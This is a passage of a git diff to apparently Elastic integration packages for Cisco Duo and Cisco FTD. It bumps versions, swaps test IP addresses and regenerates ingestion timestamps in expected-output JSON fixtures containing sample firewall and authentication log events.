Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", "outcome": "success", "reason": "user_approved", "type": "info" @@ -245,12 +245,12 @@ An example event for `auth` looks as following: }, "related": { "ip": [ - "169.232.89.219", + "89.160.20.156", "192.168.225.254" ] }, "source": { - "address": "169.232.89.219", + "address": "89.160.20.156", "as": { "number": 52, "organization": { @@ -269,7 +269,7 @@ An example event for `auth` looks as following: "region_iso_code": "US-CA", "region_name": "California" }, - "ip": "169.232.89.219", + "ip": "89.160.20.156", "user": { "email": "narroway@example.com", "group": { diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml index 08c16ac8ae8..8f1ffb8dfbb 100644 --- a/packages/cisco_duo/manifest.yml +++ b/packages/cisco_duo/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_duo title: Cisco Duo -version: 0.2.0 +version: 0.2.1 license: basic description: Collect logs from Cisco Duo with Elastic Agent. type: integration diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index 08468950ca6..fdd939e6373 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index d6d4c3719df..f3e310d78a3 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:27.491792100Z", + "ingested": "2021-12-14T14:39:18.531654624Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:27.491797700Z", + "ingested": "2021-12-14T14:39:18.531657083Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:27.491802700Z", + "ingested": "2021-12-14T14:39:18.531657528Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:27.491808700Z", + "ingested": "2021-12-14T14:39:18.531657919Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:27.491831500Z", + "ingested": "2021-12-14T14:39:18.531658301Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 7c4b90f46d0..8803eebcee6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099034Z", + "ingested": "2021-12-14T14:39:19.188442907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099043200Z", + "ingested": "2021-12-14T14:39:19.188447003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099049400Z", + "ingested": "2021-12-14T14:39:19.188447512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099055100Z", + "ingested": "2021-12-14T14:39:19.188447900Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099060900Z", + "ingested": "2021-12-14T14:39:19.188448291Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099066600Z", + "ingested": "2021-12-14T14:39:19.188448746Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099072300Z", + "ingested": "2021-12-14T14:39:19.188449178Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099078Z", + "ingested": "2021-12-14T14:39:19.188449568Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099083800Z", + "ingested": "2021-12-14T14:39:19.188449956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099089600Z", + "ingested": "2021-12-14T14:39:19.188450352Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099095400Z", + "ingested": "2021-12-14T14:39:19.188450766Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099101600Z", + "ingested": "2021-12-14T14:39:19.188451322Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099107400Z", + "ingested": "2021-12-14T14:39:19.188451729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099112400Z", + "ingested": "2021-12-14T14:39:19.188452114Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099115900Z", + "ingested": "2021-12-14T14:39:19.188452496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099120400Z", + "ingested": "2021-12-14T14:39:19.188452898Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099125600Z", + "ingested": "2021-12-14T14:39:19.188453555Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099130700Z", + "ingested": "2021-12-14T14:39:19.188454491Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:34:28.099136500Z", + "ingested": "2021-12-14T14:39:19.188454907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099140700Z", + "ingested": "2021-12-14T14:39:19.188455300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099145100Z", + "ingested": "2021-12-14T14:39:19.188455721Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099148600Z", + "ingested": "2021-12-14T14:39:19.188456120Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099153Z", + "ingested": "2021-12-14T14:39:19.188456560Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099158900Z", + "ingested": "2021-12-14T14:39:19.188457062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099164300Z", + "ingested": "2021-12-14T14:39:19.188457467Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099170100Z", + "ingested": "2021-12-14T14:39:19.188457871Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099175900Z", + "ingested": "2021-12-14T14:39:19.188458263Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099181700Z", + "ingested": "2021-12-14T14:39:19.188458700Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099187500Z", + "ingested": "2021-12-14T14:39:19.188459094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099193300Z", + "ingested": "2021-12-14T14:39:19.188459474Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099199Z", + "ingested": "2021-12-14T14:39:19.188459858Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099204700Z", + "ingested": "2021-12-14T14:39:19.188460245Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099210400Z", + "ingested": "2021-12-14T14:39:19.188460636Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099216200Z", + "ingested": "2021-12-14T14:39:19.188461117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099222100Z", + "ingested": "2021-12-14T14:39:19.188461624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099227900Z", + "ingested": "2021-12-14T14:39:19.188462016Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099233600Z", + "ingested": "2021-12-14T14:39:19.188462399Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099239300Z", + "ingested": "2021-12-14T14:39:19.188462780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099245Z", + "ingested": "2021-12-14T14:39:19.188463185Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099249100Z", + "ingested": "2021-12-14T14:39:19.188463567Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099253700Z", + "ingested": "2021-12-14T14:39:19.188463946Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099259Z", + "ingested": "2021-12-14T14:39:19.188464331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099263900Z", + "ingested": "2021-12-14T14:39:19.188464712Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099269800Z", + "ingested": "2021-12-14T14:39:19.188465090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099274100Z", + "ingested": "2021-12-14T14:39:19.188465495Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099278300Z", + "ingested": "2021-12-14T14:39:19.188465876Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099281900Z", + "ingested": "2021-12-14T14:39:19.188466261Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099286300Z", + "ingested": "2021-12-14T14:39:19.188466690Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099292200Z", + "ingested": "2021-12-14T14:39:19.188467163Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099297900Z", + "ingested": "2021-12-14T14:39:19.188467554Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099303900Z", + "ingested": "2021-12-14T14:39:19.188468035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099309800Z", + "ingested": "2021-12-14T14:39:19.188468422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099315500Z", + "ingested": "2021-12-14T14:39:19.188468818Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099321300Z", + "ingested": "2021-12-14T14:39:19.188469213Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099327100Z", + "ingested": "2021-12-14T14:39:19.188469616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099332800Z", + "ingested": "2021-12-14T14:39:19.188470011Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099338600Z", + "ingested": "2021-12-14T14:39:19.188470389Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099344300Z", + "ingested": "2021-12-14T14:39:19.188470779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to 